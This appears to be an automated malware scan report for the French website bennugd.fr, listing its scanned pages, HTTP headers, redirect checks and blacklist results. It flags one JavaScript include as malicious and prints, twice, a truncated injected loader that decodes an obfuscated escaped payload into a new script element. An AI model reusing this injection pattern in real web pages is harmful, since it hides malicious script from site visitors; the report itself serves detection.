Scanned pages/files
Request | Server response | Status |
http://bennugd.fr/ | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
http://bennugd.fr/./includes/fonctions.js | 200 OK Content-Length: 12854 Content-Type: application/javascript | clean |
http://connect.facebook.net/fr_FR/all.js | 200 OK Content-Length: 163981 Content-Type: application/x-javascript | clean |
http://bennugd.fr/./includes/secjs.js?url_def=http://www.bennugd.fr/ | 200 OK Content-Length: 8025 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0]; var s=document.createElement('script'); s.type='text/javascript'; s.text=(dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AX%19%A0%EB%AE%E1l%1C%3AW%80%1A%CFz%F7%E5%B1%15%0A%1B%0D%3CDI%BC%3E%D0%3B%F7%0B%B8%AD%AB%F2%DF%13B%979f%83@%AC%3A%B4%C6o%80%B1uq0Cc%3Cu%B5%A1s6%D1%9E%EB18%D3%98%98%96%C6%AD%FCs%3C%7D%15K%82%E6%812%B9H%FET%22%80%BD%E9@%F6W%B2C%E4%C2%17%B2%A2F%1B%FFR%BDWj%E57%23%20%8E%A21r%A3%88%07%01z%9A%FA%A8y4%DF+%1B%FA4%B8%C0%83%ED%18s%13%93%2C0%B9 Antivirus reports:
| ||
http://bennugd.fr/modules/agenda/overlib.js | 200 OK Content-Length: 49243 Content-Type: application/javascript | clean |
http://bennugd.fr/index.php | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=dofff | 200 OK Content-Length: 34082 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=forum | 200 OK Content-Length: 26555 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=downloads | 200 OK Content-Length: 26762 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=espace_membre&ac=login | 200 OK Content-Length: 11856 Content-Type: text/html | clean |
http://bennugd.fr/index.php?mod=page&ac=page&id_page=5 | 200 OK Content-Length: 11886 Content-Type: text/html | clean |
http://bennugd.fr/./index.php?mod=multi-faq&ac=index&action=faq&id=3 | 200 OK Content-Length: 42041 Content-Type: text/html | clean |
http://bennugd.fr/././includes/fonctions.js | 200 OK Content-Length: 12854 Content-Type: application/javascript | clean |
http://bennugd.fr/././includes/secjs.js?url_def=http://www.bennugd.fr/ | 200 OK Content-Length: 8025 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var h=document.getElementsByTagName('head')[0]; var s=document.createElement('script'); s.type='text/javascript'; s.text=(dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AX%19%A0%EB%AE%E1l%1C%3AW%80%1A%CFz%F7%E5%B1%15%0A%1B%0D%3CDI%BC%3E%D0%3B%F7%0B%B8%AD%AB%F2%DF%13B%979f%83@%AC%3A%B4%C6o%80%B1uq0Cc%3Cu%B5%A1s6%D1%9E%EB18%D3%98%98%96%C6%AD%FCs%3C%7D%15K%82%E6%812%B9H%FET%22%80%BD%E9@%F6W%B2C%E4%C2%17%B2%A2F%1B%FFR%BDWj%E57%23%20%8E%A21r%A3%88%07%01z%9A%FA%A8y4%DF+%1B%FA4%B8%C0%83%ED%18s%13%93%2C0%B9 Antivirus reports:
| ||
http://bennugd.fr/./index.php | 200 OK Content-Length: 33921 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bennugd.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 06:51:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 60gpBAK=R1224192509; path=/; expires=Sat, 03-May-2014 08:05:10 GMT
Set-Cookie: 60gp=R4109666695; path=/; expires=Sat, 03-May-2014 08:07:57 GMT
Set-Cookie: PHPSESSID=d6b86703c320f3281a55c3e333826f40; path=/
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: bennugd.fr
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sat, 03 May 2014 06:51:34 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: 60gpBAK=R1224192509; path=/; expires=Sat, 03-May-2014 08:05:10 GMT
Set-Cookie: 60gp=R4109666695; path=/; expires=Sat, 03-May-2014 08:07:57 GMT
Set-Cookie: PHPSESSID=d6b86703c320f3281a55c3e333826f40; path=/
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: bennugd.fr
Referer: http://www.google.com/search?q=bennugd.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bennugd.fr
Referer: http://www.google.com/search?q=bennugd.fr
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bennugd.fr
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bennugd.fr/
Result: bennugd.fr is not infected or malware details are not published yet.
Result: bennugd.fr is not infected or malware details are not published yet.